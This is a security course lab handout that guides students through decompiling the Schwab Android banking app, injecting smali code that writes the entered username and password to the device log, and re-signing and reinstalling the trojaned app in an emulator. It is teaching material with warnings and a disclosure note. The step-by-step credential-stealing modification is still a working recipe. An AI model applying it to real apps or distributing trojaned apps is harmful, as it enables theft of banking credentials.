Project 10: Adding Trojan Code to the Schwab Android App (20 pts.)

Don't Be Evil

This is a nasty thing to do. Only distribute your trojaned apps in controlled test environments!

Please be responsible in how you use this information! If you commit crimes, I won't be able to save you.

What You Need for This Project


We'll take an Android app and modify it to steal passwords.

This version just puts the passwords in the log, which is easy but not very dangerous.

A later project will post the stolen passwords on the Internet, which is a lot scarier.

Installing a Real App on the Emulated Phone

Launch Genymotion. Open the Google Play store and install Schwab Mobile, as shown below.


Responsible Disclosure

I told Schwab about this in Feb., 2015. They really, really do not care.

OWASP classified this vulnerability as #10 of the Top Ten Mobile Risks in 2011, but the new 2016 list raised it to #8.


If Schwab ever fixes this (unlikely), you can get the app version I used here:

Finding ADB

On your host machine, open a Terminal or Command Prompt window.

Execute these commands, changing the path in the first command to your correct SDK path.

Note: To find your SDK path, open Android Studio and click Tools, Android, "SDK Manager".

Here are common examples of SDK paths:

NOTE: If you are using Windows, remove the "./" before "adb".

cd /Users/sambowne/Library/Android/sdk

cd platform-tools

./adb devices -l

Note that the last character is a lower case L, not the numeral one.

You should see a device listed, as shown below.


If the Genymotion device is not visible to adb, try these troubleshooting steps.
  • Make sure the Genymotion device is running and connected to the Internet. Open the Web browser and see if you can view Web pages.
  • Try issuing these commands:
    ./adb kill-server

    ./adb start-server

  • Find the devices IP adress in Settings, Wi-Fi and connect to it with this command, replacing the IP address with the correct address in Genymotion
    ./adb connect

Pulling the APK File from the Android Emulator

Working in your sdk/platform-tools directory, execute these comands to pull the APK file from the emulator. If you are using another app, you will have to modify these commands accordingly.

Note: If you are using Windows, omit the "./" before adb, and replace "grep" with "findstr".

./adb shell pm list packages | grep wab

./adb shell pm path

./adb pull /data/app/

Move the APK file to some convenient directory to work in, such as Downloads.

Disassembling an APK with apktool

If you are using Kali Linux, you already have apktool.

Otherwise, go to

Download the latest version. When I did it on 2-22-16, it was "apktool_2.2.2.jar".

Warning: version 2.0.3 does NOT work--the app decompiles but cannot rebuild.

Save the file in the same folder you used for the APK file, such as Downloads.

Open a Command Prompt or Terminal.

Change directory to the location you placed the downloaded file and open it with java, as shown below.

cd Downloads

java -jar apktool_2.2.2.jar d

Messages appear as apktool disassembles the app, as shown below.

Exploring the Smali Code

After decoding, the Dalvik bytecode appears in a folder named "", in a subfolder names "smali". Open this in a graphical file explorer utility and explore the app. As shown below, many folder and filenames are changed to single letter--this is what ProGuard does to prevent reverse-engineering.

When I decompiled the app version from May, 2015, Schwab didn't use ProGuard, so all the names were readable, as shown below.

Finding Interesting Code with Grep

Start in the directory containing your APK file, such as Downloads.

Execute these commands:


grep -r Password smali

This searches for the string "Password" in the smali code.

One place it's found is in the smali/com/schwab/mobile/domainmodel/f/b/i.smali file, as shown below.

Saving a Screen Image

Make sure smali/com/schwab/mobile/domainmodel/f/b/i.smali is visible, as shown above.

Capture a full-screen image.


Save the image with the filename "YOUR NAME Proj 10a", replacing "YOUR NAME" with your real name.

Other Useful Search Terms

When trojaning financial apps, I found that these terms worked well.

I usually search with "grep -ir" to be case insensitive and recursive.

Viewing Smali Code

Open Finder or Windows Explorer and navigate to your Downloads folder.

Navigate to the smali/com/schwab/mobile/domainmodel/f/b/i.smali file and open it in a text editor.

At the start of the file, two fields are defined: a contains the username and b contains the password, as shown below.

Scroll down to find the "public constructor" method, as shown below.

line 27 puts the username in the p1 parameter, and line 28 puts the password in the p2 parameter.

To demonstrate the vulnerability, we'll put the username and password into the Android log. That is a famously insecure place to put them, because any app on the device can see them.

To do that, we need to make three changes in the file.

1. Reserving a Local Variable

The ".locals 0" line indicates that this method has no local variables. We need to add a local variable to hold a label for the log, so we need to change that to ".locals 1"

I recommend adding a comment line (beginning with #) before the change, so you can find it and reverse it if you make an error.

Make this change in the file, as shown below.

2. Putting the Username in the Log

Add this code after line 27, as shown below.
const-string v0, "TROJAN STEALING USERNAME:" 
invoke-static {v0, p1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I 

3. Putting the Password in the Log

Add this code after line 28, as shown below.
const-string v0, "TROJAN STEALING PASSWORD:" 
invoke-static {v0, p2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I 
Your code should have the three changes shown below:

Save the modified file.

Rebuilding the App

Now we need to rebuild the APK file from the modified smali code. This will create a "dist" subdirectory containing an APK file.

The easiest way to do that is to start from the decompiled app's home directory, which is where you left off after performing the "grep" command.

In a Terminal or Command Prompt, execute this command:

java -jar ../apktool_2.2.2.jar b .

Making a Self-Signed Certificate

You can make a certificate with "keytool", part of the Java SDK. In a Terminal or Command Prompt, execute this command:
You should see a help message for "keytool", as shown below.


If you see "keysigner not found", you are probably using Windows. The Java installer does not work and you need to set two environment variables manually.

Click Start, Computer.

Navigate to C:\Program Files\java and find out the full path to your jdk folder.

It will be something like C:\Program Files\Java\jdk1.7.0_75

Now execute this command at an Administrator command prompt, with the correct jdk version:

set JAVA_HOME="C:\Program Files\Java\jdk1.7.0_75"
You also need to add this path to the PATH environment variable.

To do that, click Start, right-click Computer, click Properties, "Advanced System Settings", "Environment Variables".

Ensure that PATH is selected, and click Edit....

At the end of the path, insert this line, with the correct jdk version:

;C:\Program Files\Java\jdk1.7.0_75\bin
Then log out and log in again.

To make your certificate, execute this command, replacing "YOURNAME" with a version of your own name that does not include any spaces:

keytool -genkey -keyalg RSA -alias selfsigned -keystore YOURNAME-keystore.jks -storepass password -validity 360 -keysize 2048
A series of question asks for your name, etc. Give any answer to these questions, as shown below. When it asks for your key password, press Enter.

This creates a self-signed certificate with a password of "password" that's valid for 360 days.

Re-Signing the APK

Since the code has changed, the old signature is invalid. We must sign it again.

To do that, we'll use the "jarsigner" tool, part of the Jave Development Kit.

In a Terminal or Command Prompt, execute this command.

You will have to adjust the path after "-keystore" match the location of your signing certificate.

I recommend that you copy your signing certificate to the Downloads folder to make this easier.

The last parameter is your key's Alias.

Execute this command:

jarsigner -keystore YOURNAME-keystore.jks dist/* selfsigned
When you are prompted to, enter the key store password of password

Uninstalling the Original App

On your Genymotion virtual Android device, tap the envelope-shaped button at the bottom center to get to the Home screen.

Tap the circle at the bottom center.

Tap Settings.

Tap Apps.

Tap Schwab.

Tap Uninstall.

Tap OK.

Installing the Modified App

Drop the APK file from the dist subdirectory onto your Genymotion Android device and drop it.

The modified app installs and launches, as shown below.

Monitoring the Log

On your computer, from the command prompt or Terminal window, go to the directory containing adb and execute this command:
./adb logcat
A lot of messages scroll by. If you want to see a cleaner display, showing only messages from the Trojan, press Ctrl+C to stop the running logcat and execute this command:
./adb logcat | grep TROJAN

Entering Data into the Trojaned App

On your Genymotion Android device, in the Schwab app, at the lower right, tap Skip.

In the next screen, at the top right, click "Log In".

Enter fake credentials, using your name as the login name, as shown below. Click "Log in".

Viewing the Stolen Data

Your Terminal window should show the stolen data, as shown below.

Saving a Screen Image

Make sure YOURNAME and a password are visible in the log, as shown above.

Capture a full-screen image.


Save the image with the filename "YOUR NAME Proj 10b", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the image to with the subject line: Proj 10 from YOUR NAME


How to unpack / pack an APK file

Dancing with dalvik

ExploitMe Mobile Android Labs

Posted 4-19-17 by Sam Bowne